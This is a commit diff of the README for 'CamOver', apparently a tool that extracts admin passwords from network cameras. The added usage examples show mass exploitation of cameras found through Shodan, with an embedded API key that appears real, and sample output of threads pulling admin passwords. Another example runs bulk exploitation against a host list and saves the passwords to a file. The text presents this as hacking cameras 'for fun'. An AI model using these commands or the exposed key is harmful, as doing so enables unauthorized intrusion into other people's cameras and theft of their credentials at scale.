Projects STRLCPY CamOver Commits 7b32d52d
🤬
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 40 lines
    41 41  Let's hack my camera just for fun.
    42 42   
    43 43  ```shell
    44  -camover --address 192.168.99.100
     44 +camover -a 192.168.99.100
    45 45  ```
    46 46   
    47 47  **output:**
    skipped 5 lines
    53 53  [i] (192.168.99.100) - password: mamahacker123
    54 54  ```
    55 55   
    56  -Let's try to use opened database of hosts with `--threads` for fast exploitation.
     56 +Let's try to use Shodan search engine to exploit cameras over Internet, we will use it with `-t` for fast exploitation.
    57 57   
    58 58  ```shell
    59  -camover --threads --input cameras.txt --output passwords.txt
     59 +camover -t --api PSKINdQe1GyxGgecYz2191H2JoS9qvgD
     60 +```
     61 + 
     62 +**output:**
     63 + 
     64 +```shell
     65 +[*] Authorizing Shodan by given API key...
     66 +[+] Authorization successfully completed!
     67 +[*] Initializing thread #0...
     68 +[*] (x.x.x.x) - connecting to camera...
     69 +[*] Initializing thread #1...
     70 +[*] (x.x.x.x) - connecting to camera...
     71 +[*] Initializing thread #2...
     72 +[*] (x.x.x.x) - connecting to camera...
     73 +[*] (x.x.x.x) - accessing camera config...
     74 +[*] (x.x.x.x) - extracting admin password...
     75 +[i] Thread #0 completed.
     76 +[*] (x.x.x.x) - connecting to camera...
     77 +[*] (x.x.x.x) - accessing camera config...
     78 +[*] (x.x.x.x) - extracting admin password...
     79 +[i] Thread #1 completed.
     80 +[*] (x.x.x.x) - connecting to camera...
     81 +[*] (x.x.x.x) - accessing camera config...
     82 +[*] (x.x.x.x) - extracting admin password...
     83 +[i] Thread #2 completed.
     84 +```
     85 + 
     86 +Let's try to use opened database of hosts with `-t` for fast exploitation.
     87 + 
     88 +```shell
     89 +camover -t -i cameras.txt -o passwords.txt
    60 90  ```
    61 91   
    62 92  It will exploit all cameras in `cameras.txt` list by their addresses and save all obtained passwords to `passwords.txt`.
    skipped 55 lines
Please wait...
Page is in error, reload to recover